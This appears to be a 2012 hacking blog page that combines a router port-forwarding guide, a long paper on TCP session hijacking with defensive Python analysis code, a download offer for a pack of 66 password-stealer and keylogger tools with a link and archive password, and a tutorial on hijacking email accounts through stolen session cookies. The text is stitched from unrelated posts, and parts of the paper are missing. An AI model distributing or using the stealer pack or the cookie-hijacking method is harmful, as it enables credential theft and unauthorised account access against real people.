Saturday, May 26, 2012

Easy and Powerful Port Forwarding

INTRODUCTION
For those of you looking to at last find out how to make that darn router work and finally “forward” those darn “ports,” I’ll walk you through the process step by step, using language and pictures that even the most basic of users will be able to understand.
Now there are a variety of different routers out there, each of course having a different user interface that one must access to make changes to the router. The two most common routers used by individuals are the Linksys and Netgear models. As such, these are the two models I intend to cover, but with a basic detail of how to access and port forward them all.
LINKSYS

The first step in port forwarding is accessing the router. The IP address varies from router to router, so check the manufacturer’s website or the handbook that was included when purchased. Next, open your internet browser and type in the proper IP address according to the directions below.
For LINKSYS the IP address is 192.168.1.1 and the default logins are as follows:
username = admin
password = admin

Also, remember to change the passwords for your router after logging on if you haven’t done so already. Since the user defaults are widely known, and are exactly that–defaults, anyone can log on to your router and leech off your bandwidth, or even worse, monitor your web traffic and perhaps even block you from logging on, period. So it cannot be stressed enough to change your passwords after logging on.
Okay now for the fun part, forwarding those pesky ports.
After logging on, you will see the main setup page. Click on the Applications & Gaming tab at the top of the page.

This will bring you to the Port Range Forward page. Here is where we will actually forward the ports as the page name implies.

In the first box you will enter the name of the application this will apply to, be it BitTorrent, eMule, eDonkey, or whatever. For argument’s sake we will apply it here as BitTorrent, with the specific BitTorrent client to be Azureus. So for Application type “Azureus.”
For the Start and End Port, we’ll select a port from the recommended 49152 – 65535 range (for BitTorrent only, and be sure to apply this port number to the Azureus client as well). Keep in mind that the ports used are program specific, so check which ones the program requires to be forwarded. Type the port number or range in both boxes.
In the IP Address box type the IP address of the computer to which this is to apply. If you’re not sure what the IP address is, follow these easy steps:



At the risk of stating the obvious, you’ll notice your IP address will be listed there at the top where it says “IP Address.” This is the address for the computer whose ports you are forwarding.
To finish, the last thing you want to do on the Port Range Forward page is to check the “enable” box. You’d be surprised at how many people forget to do this simple task. Now click Save Settings at the bottom of the page and we’re all done. Presto, your ports are now forwarded.
NETGEAR
For NETGEAR the IP address is 192.168.0.1 and the default logins are as follows:
username = admin
password = password

Also, remember to change the passwords for your router after logging on if you haven’t done so already. Since the user defaults are widely known, and are exactly that–defaults, anyone can log on to your router and leech off your bandwidth, or even worse, monitor your web traffic and perhaps even block you from logging on, period. So it cannot be stressed enough to change your passwords after logging on.
After logging on, you will arrive at the main setup page. Click on the Port Forwarding / Port Triggering tab on the bottom left-hand side of the screen.

This will bring you to the Port Forwarding page.

We’re going to “Add Custom Service,” so click this tab at the center of the page.

In the first box, Service Name, you will enter the name of the application this will apply to, be it BitTorrent, eMule, eDonkey, or whatever. For argument’s sake we will apply it here as BitTorrent, with the specific BitTorrent client to be Azureus. So for Service Name type “Azureus.”
For the Start and End Port, we’ll select a port from the recommended 49152 – 65535 range (for BitTorrent only, and be sure to apply this port number to the Azureus client as well). Keep in mind that the ports used are program specific, so check which ones the program requires to be forwarded. Type the port number or range in both boxes.
The Server IP Address is the IP address of the computer this is to apply to.
If you’re not sure what the IP address is, follow these easy steps:

Now type “cmd”

At the risk of stating the obvious, you’ll notice your IP address will be listed there at the top where it says “IP Address.” This is the address for the computer whose ports you are forwarding.
To finish, click the Add tab, and then the Apply tab on the port forwarding main page. Presto, your ports are now forwarded.



Article By Sumit Shukla [Admin]

Session Hijacking in Windows Networks | Best Full Guide Ever

Hope this works for you guys! I was unable to put the images so I’ll upload them and name them according to the post :)
Session Hijacking in Windows Networks
1 TCP/IP Basics
1.1 Three-Way-Handshake
1.1.1 Step 1 - SYN
1.1.2 Step 2 – SYN/ACK
1.1.3 Step 3 - ACK
1.2 Sequence Numbers
2 Session Hijacking Definition
2.1 Advantages of Session Hijack for the Attacker
2.2 What Makes the Attack so Dangerous?
3 The Session Hijack Attack
3.1 Procedural Overview of the Session Hijack Attack
3.1.1 Step 1 - Locating a Target
3.1.2 Step 2 - Find an Active Session
3.1.3 Step 3 - Perform Sequence Number Prediction
3.1.4 Step 4 - Take One of the Parties Offline
3.1.5 Step 5 - Take over the Session and Maintain the Connection
4 Session Hijack Tools
5 Detecting Session Hijack Attacks
5.1 Packet Sniffers
5.1.1 Normal Telnet Session
5.1.2 The Attack Begins - Forcing an ARP Entry
5.1.3 Hijack Traffic
6 Session Hijacking Remediation
6.1 Protect Against Spoofing
6.2 IPSec and Encryption
6.3 Intrusion Detection Systems and IPS Intrusion Prevention Systems
6.4 Eliminating Insecure Network Protocols and Operating Systems
6.5 GPO - Group Policy Objects
7 Summary
8 References

Introduction
Before we can explore the session hijack attack, it is essential that we gain a basic
understanding of network communications. The first section of this paper covers some of this
background information needed to understand how computers communicate on a network.
First we take a look at the TCP/IP protocol (Transmission Control Protocol/Internet Protocol)
examining a concept critical to network communication called the three-way-handshake.
Once we have a basic understanding of these concepts, we can then work towards
understanding how the session hijack attack exploits the design flaws inherent in the TCP/IP
protocol.
In section two, the session hijacking attack is defined. The benefits of the attack are
closely examined as well as the danger the attack presents to your network.
Section three examines the session hijack attack in detail. The session hijack attack is
broken down into five steps including locating a target, finding an active session, sequence
number prediction, taking a user offline, and taking over a session.
Detecting the session hijack attack on a network can be very difficult. In section four, session hijacking detection will be examined. Attack signatures will be examined
and real world examples provided.

Section five examines session hijacking software applications that are used by
attackers to compromise computers. Windows and Linux/Unix applications will be reviewed,
and their features described.
Section six discusses the various ways in which session hijacking can be detected on
the network. Using Wireshark, packet captures of a session hijack attack are examined.
Section seven looks at the various countermeasures that can be implemented on your
network that will help reduce your exposure to this attack. Microsoft Group Policy Objects,
IPSec, IDS and IPS systems, and insecure network protocols and operating system will be
examined.

1 TCP/IP Basics
Before we explore the session hijack attack, readers must possess a basic
understanding of how computers communicate with one another on a network. In the section
that follows, we will look at some basic elements of TCP/IP (Transmission Control
Protocol/Internet Protocol), specifically the concepts of the three-way-handshake and
random initial sequence number generation.
In order for two machines to communicate on a network they have to negotiate
common communication parameters. This is done by transmitting a series of data packets
between the two machines in a process known as the three-way-handshake. All computers
on the network must complete this process in order to establish a connection with another
computer on the network.
1.1 Three-Way-Handshake
When two computers want to communicate with one another, they have to negotiate
the technical parameters that they will use to communicate with one another. This is done
through a process known as the three-way-handshake. Once the connection is established,
the session remains open until one of the machines sends a RST (reset) or FIN (finish)
packet to their communication partner.
The three-way-handshake is comprised of three main processes. Please note that the
discussion that follows is based on a scenario where a single workstation computer is
attempting to communicate with a file server.
1.1.1 Step 1 - SYN
When a workstation wants to communicate with a server it builds a packet with
the SYN or synchronization bit set and then sends the packet to the server. Included in this
SYN packet is an initial sequence number (denoted in figure 1 as X).
Figure 1 – Step 1 SYN
When the client computer generates the sequence number, it uses a random number
generator. Random number generators are used to help prevent communication sessions
from being compromised (more on this in the next section). Sequence numbers are critical to
network communications as they are used to guarantee packet delivery. Source computers
use sequence numbers for tracking incoming packets and reassembling them as they arrive
at their destination. From the attacker’s perspective, however, the ability to predict sequence
numbers provides the mechanisms needed to successfully hijack a communication session.
1.1.2 Step 2 – SYN/ACK
When the server receives the client’s SYN (synchronization) packet, it responds to the
workstation computer with a packet containing both the SYN and ACK (Synchronization and
Acknowledgement) bits set. The packet includes the server’s own randomly generated
sequence number (represented in the drawing by the letter P). The server also acknowledges
the client’s sequence number by adding 1 to the sequence number sent by the client computer
(X + 1) (Lamb, 2006).
Figure 2 – Step 2 SYN/ACK

1.1.3 Step 3 - ACK
The final phase of the three-way-handshake involves the client sending an ACK packet
to the server confirming its desire to communicate. The workstation prepares a packet with
the ACK (acknowledgement) bit set and includes an acknowledgement sequence number (X
+ 1). When the packet arrives at the destination server, the communication session is
established and communication can now begin. An active communication session will be
maintained until one of the machines sends a RST (Reset) or FIN (Finish) packet to the other
computer.
Figure 3 – Step 3 ACK
The following screen output from Wireshark shows what a three-way handshake looks
like in Wireshark. Packet number three begins the three-way-handshake process by sending
a SYN (synchronization) packet to the server. The server then acknowledges the receipt of
the SYN packet by sending the workstation computer a SYN/ACK
(Synchronization/Acknowledgement) packet (shown in packet four). The final step in the
three-way-handshake is an ACK packet sent to the workstation by the server.
Figure 4 - Example of the Three-Way-Handshake in Wireshark (Resultspk.com, 2006)
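The numbering described in steps 1 to 3, as an added example that is not part of the original paper: it parses three raw TCP headers and checks the X, P and X + 1 relationships, including 32-bit wraparound. The header bytes are constructed sample data; the ports and helper names are assumptions, and the check that the final ACK acknowledges P + 1 is standard TCP behaviour that the text does not spell out.

```python
import struct

# Flag bits in the TCP header.
SYN, RST, ACK = 0x02, 0x04, 0x10
MOD = 2 ** 32  # sequence numbers are 32-bit and wrap around


def build_tcp_header(sport, dport, seq, ack, flags):
    """Build a minimal 20-byte TCP header (constructed sample data, checksum left at 0)."""
    offset_flags = (5 << 12) | flags  # data offset of 5 words, no options
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, offset_flags, 65535, 0, 0)


def parse_tcp_header(raw):
    """Extract the ports, sequence/acknowledgement numbers and flags."""
    if len(raw) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    sport, dport, seq, ack, offset_flags = struct.unpack("!HHIIH", raw[:14])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": offset_flags & 0x3F}


def check_handshake(segments):
    """Validate SYN -> SYN/ACK -> ACK numbering; return (ok, reason)."""
    if len(segments) != 3:
        return False, "need exactly three segments"
    syn, synack, ack = (parse_tcp_header(s) for s in segments)
    if any(h["flags"] & RST for h in (syn, synack, ack)):
        return False, "a segment carries RST"

    # Step 1: the client sends a bare SYN carrying its initial sequence number X.
    if (syn["flags"] & (SYN | ACK)) != SYN:
        return False, "segment 1 is not a bare SYN"
    x = syn["seq"]

    # Step 2: the server answers with SYN/ACK, its own number P, and ack = X + 1.
    if (synack["flags"] & (SYN | ACK)) != (SYN | ACK):
        return False, "segment 2 is not a SYN/ACK"
    if (synack["sport"], synack["dport"]) != (syn["dport"], syn["sport"]):
        return False, "segment 2 is not the server's reply on this connection"
    if synack["ack"] != (x + 1) % MOD:
        return False, "server did not acknowledge X + 1"
    p = synack["seq"]

    # Step 3: the client sends a bare ACK with seq = X + 1 and ack = P + 1.
    if (ack["flags"] & (SYN | ACK)) != ACK:
        return False, "segment 3 is not a bare ACK"
    if (ack["sport"], ack["dport"]) != (syn["sport"], syn["dport"]):
        return False, "segment 3 is not from the client"
    if ack["seq"] != (x + 1) % MOD or ack["ack"] != (p + 1) % MOD:
        return False, "client ACK does not carry seq X + 1 and ack P + 1"
    return True, "handshake numbering is consistent"


def sample_handshake(x, p, client_port=49200, server_port=23):
    """Three constructed headers for a workstation opening a Telnet connection."""
    return [
        build_tcp_header(client_port, server_port, x, 0, SYN),
        build_tcp_header(server_port, client_port, p, (x + 1) % MOD, SYN | ACK),
        build_tcp_header(client_port, server_port, (x + 1) % MOD, (p + 1) % MOD, ACK),
    ]


if __name__ == "__main__":
    # X at the top of the 32-bit range shows the acknowledgement wrapping to 0.
    print(check_handshake(sample_handshake(0xFFFFFFFF, 3000)))
```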
1.2 Sequence Numbers
Sequence numbers are an essential component of network communications. It is the
sequence number that ensures reliable communication on the network. As packets leave the
transmitting computer, each packet is assigned a unique sequence number. Sequence
numbers provide a mechanism which allows the receiving computer to track incoming packets
and reassemble them into a logical stream of data. Sequence numbers can also be used to
detect packets that have not arrived at the destination computer. When packet loss is
detected, the destination machine notifies the source computer to resend the missing packet.
TCP/IP sequence numbers are 32-bit numbers, thus providing four million possible
number combinations. While this seems like a sufficient quantity of numbers to reduce the
chance of sequence number prediction, modern computers make this number arbitrary. Most
modern operating systems implement pseudo random number generators that produce
complex sequence numbers sufficient to make sequence number prediction difficult if
not impossible. However, older operating systems, such as Windows NT 4.0, did not provide
sufficient random number generation as discussed in Microsoft knowledge base article
MS99-046. As you will see in the sections that follow, sequence numbers, and the ability to predict
sequence numbers, are a vital component necessary to successfully wage a session hijack
attack.
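Why the quality of initial sequence number generation matters, as an added example that is not part of the original paper: a weak fixed-step generator beside a keyed generator in the style of RFC 6528 (ISN = M + F(localip, localport, remoteip, remoteport, secretkey)), with a measurement an administrator could run over ISNs sampled from their own host. The fixed step, the use of HMAC-SHA256 as F, the addresses and all names are assumptions; the weak model is a constructed illustration, not the behaviour of any specific operating system.

```python
import hashlib
import hmac
import struct
from collections import Counter

MOD = 2 ** 32


class CounterISN:
    """Weak model: each new connection gets the previous ISN plus a fixed step."""

    def __init__(self, start, step=64000):
        self.value = start
        self.step = step

    def next_isn(self, four_tuple, clock_ticks):
        # The connection identity and the clock are ignored entirely.
        self.value = (self.value + self.step) % MOD
        return self.value


class KeyedISN:
    """RFC 6528 style: a timer plus a keyed hash of the connection four-tuple."""

    def __init__(self, secret):
        self.secret = secret

    def next_isn(self, four_tuple, clock_ticks):
        # F(): HMAC-SHA256 truncated to 32 bits (assumption; the RFC leaves F open).
        digest = hmac.new(self.secret, repr(four_tuple).encode(), hashlib.sha256).digest()
        offset = struct.unpack("!I", digest[:4])[0]
        return (clock_ticks + offset) % MOD


def observe(generator, connections):
    """ISNs one remote peer would see over successive connections (constructed)."""
    isns = []
    for i in range(connections):
        # Each new connection comes from a different client source port.
        four_tuple = ("192.0.2.20", 23, "192.0.2.10", 49200 + i)
        isns.append(generator.next_isn(four_tuple, 1_000_000 + i * 250))
    return isns


def guessable_fraction(isns):
    """Share of ISNs that equal the previous ISN plus the most common delta."""
    deltas = [(b - a) % MOD for a, b in zip(isns, isns[1:])]
    if not deltas:
        return 0.0
    most_common_delta, hits = Counter(deltas).most_common(1)[0]
    return hits / len(deltas)


if __name__ == "__main__":
    weak = observe(CounterISN(start=123456), 50)
    strong = observe(KeyedISN(b"constructed-secret"), 50)
    print("fixed-step generator:", guessable_fraction(weak))
    print("keyed generator:     ", guessable_fraction(strong))
```

A value near 1.0 means an observer of earlier connections could state the next ISN in advance; the keyed generator still advances with the clock for any single four-tuple, which is what keeps old segments from being accepted on a reused connection.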
2 Session Hijacking Definition
If you are like most security professionals, session hijacking is not an attack that gets a
lot of your attention. In recent years, the session hijack attack has been overshadowed by
spyware, root kits, bot networks, and denial of service attacks. Although the session hijack
attack is not in the forefront of everyone’s mind, it still remains a commonly used attack. In
fact, Kevin Mitnick used many of the underlying principles common to session hijacking in his
famous breach of Tsutomu Shimomura’s computers (Meriwether, 1995).
Session hijack attacks are defined as taking over an active TCP/IP communication
session without their permission or knowledge. When implemented successfully, attackers
assume the identity of the compromised user, enjoying the same access to resources as the
compromised user.
Session hijack attacks are usually waged against users that are members of large
networks containing a substantial number of open sessions. Network protocols like FTP,
Telnet, and rlogin are especially attractive to the attacker, because of the session oriented
nature of their connections, and the length of their communication sessions. Additionally,
FTP, TELNET, and rlogin do not implement any security during logon, authentication, or data
transmission. In fact, data sent using these protocols is sent in clear text which can easily
be viewed by anyone monitoring the network.
There are three different types of session hijack attacks: active, passive, and hybrid.
The active attack is when the attacker hijacks a session on the network. The attacker will
silence one of the machines, usually the client computer, and take over the client’s position in
the communication exchange between the workstation and the server. The active attack also
allows the attacker to issue commands on the network making it possible to create new user
accounts on the network, which can later be used to gain access to the network without
having to perform the session hijack attack.
Figure 5 - Aggressive Session Hijack Attack
Passive session hijack attacks are similar to the active attack, but rather than removing
the user from the communication session, the attacker monitors the traffic between the
workstation and server. The primary motivation for the passive attack is it provides the
attacker with the ability to monitor network traffic and potentially discover valuable data or
passwords.
[Diagram: File Server, Workstation PC and Attacker. The workstation remains online while the attacker listens to all traffic that is sent between the server and workstation; the attacker does not remove the workstation computer from the session.]
Figure 6 - Passive Session Hijack
The final type of session hijack attack is referred to as the hybrid attack. This attack is
a combination of the active and passive attacks, which allows the attacker to listen to network
traffic until something of interest is found. The attacker can then modify the attack by
removing the workstation computer from the session, and assuming their identity.

2.1 Advantages of Session Hijack for the Attacker
So what makes the session hijack attack worthwhile for the attacker? One of the most
valuable byproducts of this type of attack is the ability to gain access to a server without
having to authenticate to it. Once the attacker hijacks a session, they no longer have to worry
about authenticating to the server as long as the communication session remains active. The
attacker also enjoys the same server access as the compromised user because the user has
already authenticated to the server prior to the attack.
A successful session hijack attack also allows the attacker to issue commands to
servers on the network. This is usually done to create user accounts that can be used to
access resources at a later date. The ability to issue commands also provides a way to mask
the attacker’s presence on the network, by removing or altering the remnants of the attack.
The session hijack attack is very stealthy. Session hijack attacks are usually waged
against busy networks with a high number of active communication sessions. The high
network utilization not only provides the attacker with a large number of sessions to exploit,
but it can also provide the attacker with a shroud of protection due to the large number of
active sessions on the server.
Most network attacks depend on software or hardware vulnerabilities as a gateway to
an attack. Having knowledge of specific vulnerabilities in these technologies allows the
attacker to scan servers to determine what vulnerabilities exist. However, the session hijack
attack does not depend on specific software or hardware vulnerabilities, but rather a design
limitation within the TCP/IP protocol that does not guarantee security after the connection is
made.
Session Hijacking is also very easy to do, especially on older operating systems!
Utilizing commercially available software packages, even a novice computer user has a good
chance at successfully waging a session hijack attack.
2.2 What Makes the Attack so Dangerous?
Why is the session hijack attack so dangerous? Should security professionals really be
concerned? The answer to both of these questions is yes! As I hinted in the previous
paragraph, the risks resulting from session hijack attacks cannot be eliminated by software
patches, complex passwords, or multi-factor authentication. The root cause of the attack lies
with design limitations inherent to the TCP/IP protocol. In addition, all machines regardless of
operating system or hardware architecture are vulnerable to the session hijack attack
provided they are running TCP/IP.
The attack also exploits all three sides of the CIA triad. The CIA triad is a
representative model of security concepts consisting of three underlying principles.
Confidentiality, integrity, and availability make up the triad, and a failure on any side of the
triad represents a compromise in network security (Cole, E. & Fossen, J. & Northcutt, S. &
Pomeranz, H., 2005).
Figure 7 - CIA Triad
The session hijack attack compromises all three sides of the CIA triad. When a
successful attack is achieved, the attacker has the ability to read and modify data, violating
the confidentiality and integrity portion of the model. Availability is also affected by the session
hijack attack due to ARP storms and denial of service conditions that are a byproduct of the
attack.

3 The Session Hijack Attack
The session hijack is a process whereby the attacker inserts themselves into an
existing communication session between two computers. Generally speaking, session hijack
attacks are usually waged against a workstation server type of communication session;
however, hijacks can be conducted between a workstation computer communicating with a
network based appliance like routers, switches or firewalls.
3.1 Procedural Overview of the Session Hijack Attack
As outlined in the book by Eric Cole, Hackers Beware: The Ultimate Guide to Network
Security, the session hijack attack contains the following steps (Cole, 2002).
3.1.1 Step 1 - Locating a Target
The first step in the session hijack attack is locating a target user. Attackers look for
two things prior to their attack. First, they look for networks that have a high level of utilization.
High volume networks provide a healthy supply of users to choose from, which also helps the
attack remain anonymous. Secondly, users who frequently use insecure network protocols
such as Telnet, rlogin (remote logon), and FTP (file transfer protocol) are also frequent targets
due to their inherently insecure design.

Packet sniffing software can be used to sniff network traffic for the purpose of locating
vulnerable protocols like FTP, Telnet, and rlogin. Port scanning software can also be used to
identify servers that have FTP, Telnet, or rlogin ports open.
3.1.2 Step 2 - Find an Active Session
Session hijack attacks are usually waged against servers with large amounts of
activity. The reason is twofold: first, high network utilization provides an environment containing
adequate sessions that can be exploited. Secondly, the high usage on the server helps hide
the disruption caused by the attack. Attackers generally target session oriented protocols like
FTP, Telnet, and rlogin which provide prolonged connections to other computers.
Attackers who are looking for open sessions generally use software tools like
Wireshark or more sophisticated site detection software that is included in some of the
popular session hijacking software packages like T-Sight or Juggernaut.
3.1.3 Step 3 - Perform Sequence Number Prediction
Now that a target has been chosen, the next step in the session hijack process is
sequence number prediction. This process entails guessing the next sequence number that
the server is expecting from the workstation. Sequence number prediction is a critical step,
because failing to predict the correct sequence number will result in the server sending reset
packets and terminating the connection attempt. If the attacker guesses the sequence
numbers wrong repeatedly, the likelihood of detecting the attack increases.
So how do you accurately predict the next sequence number? While sequence number
guessing can be done manually by skilled attackers, software tools are available to automate
the process. Programs such as Juggernaut (www.packetstorm.securify.com), Hunt
(http://fsid.cvut.cz/~kra/index.html), and T-Sight (http://www.engarde.c...ftware/t-sight/)
are very effective tools that can be successfully used by attackers of moderate skill levels.
3.1.4 Step 4 - Take One of the Parties Offline
Once a session is chosen and sequence numbers predicted, you need to
silence the workstation computer. This is generally done with a denial of service attack;
however, any attack that renders the computer unable to communicate on the network
would work just as well. The attacker must ensure that the client computer remains offline for
the duration of the attack or the client computer will begin transmitting data on the network
causing the workstation and the server to repeatedly attempt to synchronize their connections
resulting in a condition known as an ACK storm.
Taking the client computer offline is only done in an aggressive session hijack attack.
Remember, the passive attack is used to view data as it flows across the network; therefore,
removing the workstation in this scenario would prohibit the attacker from examining the
communications between the two machines.
3.1.5 Step 5 - Take over the Session and Maintain the Connection
The final phase of the session hijack attack entails taking over the communication
session between the workstation and server. The attacker will spoof their client IP address, to
avoid detection, and include a sequence number that was predicted earlier. If the server
accepts this information, the attacker has successfully attacked the communication session.
Because the attacker’s source address has been spoofed, the attacker will not receive any
feedback regarding the status of the attack. As a result, the attacker will have to understand
what the server is expecting to maintain the attack.
At this point in the attack, full access to the network is limited only by the permissions
of the compromised user or computer. Provided that the TCP/IP session is maintained, the
attacker will not have to repeat the hijack process for the duration of the connection.
4 Session Hijack Tools
While session hijacking is possible without the assistance of hijacking software, many
attackers choose to use software tools due to their ease of use. The session hijacking tools
available today provide precision, timing, and session prediction capabilities.

Juggernaut is one of the most popular software packages for session hijacking and it
runs only on the LINUX operating system. Juggernaut contains a built-in network sniffer which
aids in the hijacking process and allows the attacker to watch for keywords as they flow
across the network. Juggernaut is frequently used when attackers want to capture passwords
as they flow across the network.
Hunt, another UNIX based software application, is primarily used for session hijacking
attacks where attackers want to listen and intercept network communications, as well as
hijack open sessions on a network. Sequence number prediction, and silencing the
workstation computer are all handled internally by the software.
T-Sight, written for the Windows Operating system, is a commercially available product
that provides most of the functionality of the UNIX software variants. The application can be
purchased from Engarde at the following web site (http://www.engarde.c...oftware/t-sight).
This commercial application was intended to be used by professional security engineers;
however, it is very effective in the hands of an attacker. T-Sight automates the selection of
open sessions, provides accurate sequence number prediction, and is capable of silencing
target workstations.

5 Detecting Session Hijack Attacks
There are two primary technologies that assist in session hijack detection. The more
manual of the two methods is packet sniffing software which can be used to scan for
signatures of an attack. Intrusion detection systems (IDS) and intrusion prevention systems
(IPS) provide a more automated method of detection, but they can also create more analysis
work for the security administrator.
5.1 Packet Sniffers
Packet sniffers are software applications that possess the ability to capture packets as
they flow across the network. Once captured, the contents of the packets can be examined
using a variety of filtering tools. One of the most popular packet sniffers on the market is
called Wireshark and it is available for free at http://www.wireshark.org/.
Using packet sniffing software to detect session hijack attacks can be very difficult.
Doing so requires the user to configure the software to scan the network while displaying the
results to the computer screen in real time. After initiating the scan, the operator would have
to analyze the data in real time as it is displayed on the screen. Due to the difficulty
surrounding this method, packet sniffing software is generally used as an investigative tool
rather than a front line detection or defense tool.
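Using a capture as an investigative tool, as an added example that is not part of the original paper: offline checks over exported packet records for two byproducts of the attack that the paper names, the ACK storm between the workstation and server and a forced ARP entry. The record layout, thresholds, addresses and function names are assumptions, and the sample records are constructed.

```python
from collections import defaultdict, namedtuple

# Constructed record layouts, as if exported from a packet capture.
Packet = namedtuple("Packet", "ts src sport dst dport flags payload_len")
ArpReply = namedtuple("ArpReply", "ts ip mac")

ACK, PSH_ACK = 0x10, 0x18
FLAG_MASK = 0x17  # FIN | SYN | RST | ACK
CLIENT, SERVER = ("192.0.2.10", 49200), ("192.0.2.20", 23)


def flow_key(p):
    """Direction-independent key for one TCP connection."""
    a, b = (p.src, p.sport), (p.dst, p.dport)
    return (a, b) if a <= b else (b, a)


def find_ack_storms(packets, window=1.0, threshold=10):
    """Flag connections where BOTH ends send many empty ACKs inside one window.

    In a normal transfer one side sends data and the other acknowledges it;
    in an ACK storm neither side accepts the other's numbers, so empty ACKs
    bounce in both directions.
    """
    events = defaultdict(list)
    for p in packets:
        if (p.flags & FLAG_MASK) == ACK and p.payload_len == 0:
            key = flow_key(p)
            direction = 0 if (p.src, p.sport) == key[0] else 1
            events[key].append((p.ts, direction))
    storms = {}
    for key, seen in events.items():
        seen.sort()
        counts, start, peak = [0, 0], 0, 0
        for ts, direction in seen:
            counts[direction] += 1
            while ts - seen[start][0] > window:  # slide the window forward
                counts[seen[start][1]] -= 1
                start += 1
            peak = max(peak, min(counts))
        if peak >= threshold:
            storms[key] = peak  # empty ACKs per direction at the worst moment
    return storms


def find_arp_changes(replies):
    """Report every IP address whose advertised MAC address changes."""
    known, changes = {}, []
    for r in sorted(replies, key=lambda r: r.ts):
        old = known.get(r.ip)
        if old is not None and old != r.mac:
            changes.append((r.ts, r.ip, old, r.mac))
        known[r.ip] = r.mac
    return changes


def normal_telnet(keystrokes=30):
    """Constructed sample: keystroke, server echo, client ACK, every 200 ms."""
    out = []
    for i in range(keystrokes):
        t = i * 0.2
        out.append(Packet(t, *CLIENT, *SERVER, PSH_ACK, 1))
        out.append(Packet(t + 0.01, *SERVER, *CLIENT, PSH_ACK, 1))
        out.append(Packet(t + 0.02, *CLIENT, *SERVER, ACK, 0))
    return out


def ack_storm(start=10.0, count=40):
    """Constructed sample: empty ACKs alternating between both ends."""
    out = []
    for i in range(count):
        src, dst = (CLIENT, SERVER) if i % 2 == 0 else (SERVER, CLIENT)
        out.append(Packet(start + i * 0.005, *src, *dst, ACK, 0))
    return out


def sample_arp():
    """Constructed sample: the server's IP is later claimed by another MAC."""
    return [ArpReply(1.0, "192.0.2.20", "02:00:00:00:00:20"),
            ArpReply(2.0, "192.0.2.10", "02:00:00:00:00:10"),
            ArpReply(9.5, "192.0.2.20", "02:00:00:00:00:99")]


if __name__ == "__main__":
    print(find_ack_storms(normal_telnet() + ack_storm()))
    print(find_arp_changes(sample_arp()))
```

An ARP change on its own also occurs when a network card is replaced or an address is reassigned, so it is most useful when it lines up in time with a storm on the same connection.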

The following Wireshark screen shots show us what the various steps of the session
hijack attack look like within Wireshark.
5.1.1 Normal Telnet Session
Now that the communication session has been established, the client and server can
communicate via the Telnet protocol. This screen shot shows what a normal telnet
communication session looks like in Wireshark. You can clearly see data packets being sent
to the server and subsequently acknowledged by the server.

settings.
The group policy material outlined below is based on a Windows 2003 Native domain
structure with client computers running Windows 2000 Professional or Windows XP
Professional workstations. Networks consisting of older operating systems like Windows
95/98/ME or Windows NT 4.0 cannot be secured using GPOs due to their lack of support for
Active Directory.

Summary
In the era of viruses, worms, malware, buffer overflows and the like, the session hijack
attack is still alive and well. The attack is very effective and can provide the attacker with
unlimited access to server resources. The session hijack attack allows the attacker to
monitor the network for password information which can later be used to create access
accounts on the compromised machine, or intercept data flowing between the client and
server.
Defending against the session hijack attack is very difficult because the attack is not
dependent on software vulnerabilities, but rather, protocol limitations within the TCP/IP
protocol. Some of the byproducts of the attack are subtle, and are usually dismissed by users
and network administrators as normal network events.
A variety of methods can be used to reduce your exposure to the attack including
intrusion detection and intrusion prevention systems, firewall configuration, IPSec, secure
FTP and Telnet, and Windows 2000/2003 Group policy objects. These technologies
implemented together for form a defense in depth strategy, can provide a great deal of
protection against the session hijack attack.

Silent Keylogger

Top 66 Stealer Keylogger Pack 100% Virus Free

Dimension Stealer 2 by Gumball.rar
Dark Screen Stealer 2.rar
CyberShark.rar
Codesoft PW Stealer 0.50.rar
Codesoft PW Stealer 0.35.rar
Blade Stealer 1.0 PUBLIC.rar
bl0b Recovery 1.0.rar
Armageddon Stealer 1.0 by Krusty.rar
Ardamax 3.0.rar
Allround Stealer.rar
Albertino_Simple_Keylogger.rar
1337 SteamACC Stealer Private.rar
ZH_Stealer_v.5.rar
Viotto Keylogger 2.0.rar
UNLIMITED_PW_STEALER_0.4.rar
Universal1337 v3.rar
Universal1337 v2.rar
Universal1337 - The Account Stealer.rar
Ultimate Stealer 1.0.rar
Tool-Store FileZilla Stealer 1.0.rar
The Simpsons Stealer 0.2.rar
System Stealer 2.rar
StupidStealerv6_HackHound.rar
Stupid Stealer 6.5 (Fix with WIN7).rar
Stupid Stealer 6 mit PHP Logger.rar
Steel.rar
Steam Stealer by till7.rar
Steam Stealer 1.0 by ghstoy.rar
SStealer by till7.rar
SPS Stealer.rar
SimpleStealer 2.1.rar
Sharp Keylogger v1.0.rar
SC LiteStealer 1.rar
Remote Penetration 2.2.rar
RefStealer1.2.rar
RapZo Logger v 1.5 ( Public Edition ).rar
Rapid Keylogger v 1.1.rar
PWStealer 2.0.rar
Pure-Steam 1.0 CS.rar
Public Firefox 3 Stealer.rar
ProStealer.rar
pixel Stealer 1.4.0.rar
pixel Stealer 1.3.0 SC.rar
Pesca Stealer 0.2.rar
Pass Stealer 3.0.rar
Papst Steale.NET.rar
Multi Password Stealer 1.6.rar
LabStealer by Xash.rar
iStealer_6.3_Legends.rar
iStealer_4.0.4+ Tools.rar
IStealer 6.0 Legends.rar
IStealer 4.0.rar
ICQ Steal0r.rar
HardCore Soft 0.0.0.1.rar
Hackhound Stealer.rar
Hackhound 0.0.1.4.rar
Hackbase Steam Phisher 1.2 BETA.rar
Gmail_Hacker.rar
Fudsonly Stealer 0.1.rar
Fly Stealer 0.1.rar
Firefox Password Stealer - Steamcafe.rar
Firefox Password Stealer.rar
FileZilla Stealer by Stonedinfect.rar
FileZilla Stealer 1.0 PUBLIC.rar
EasyLogger2.1_Public.rar

Download:- http://filesmy.com/1j85j3 Password:- haloxss

Hack email accounts or passwords using session cookies

What are Session Cookies or Magic Cookie or Session ID?
Let's discuss this in very simple language. Whenever we log in to our account, the server generates a unique string that allows automatic login for a limited time; after that time it expires by itself.
Note that it lives only as long as your web browser is open. If you close your web browser, it is deleted (a more recent change to cookies, made to provide more security).
This unique string, simply called the magic cookie, is stored in two places: the first copy is stored on the server (which we cannot do anything about) and the second is stored in our web browser in the form of a cookie.
This cookie is destroyed in three ways: first, when you close your web browser; second, when you sign out of your account; and third, if you leave your account open and idle for more than 20 minutes.

How to access the cookies on local system?
As i am explaining this tutorial for hacking yahoo email account. So in your web browser just open yahoo.com and login into your account.
After that type the below code exactly and then press enter:

javascript:alert(document.cookie);
Now create one fake account on yahoo.com and login in that account and retrieve the cookie in same manner and notice the changes in session ID's.

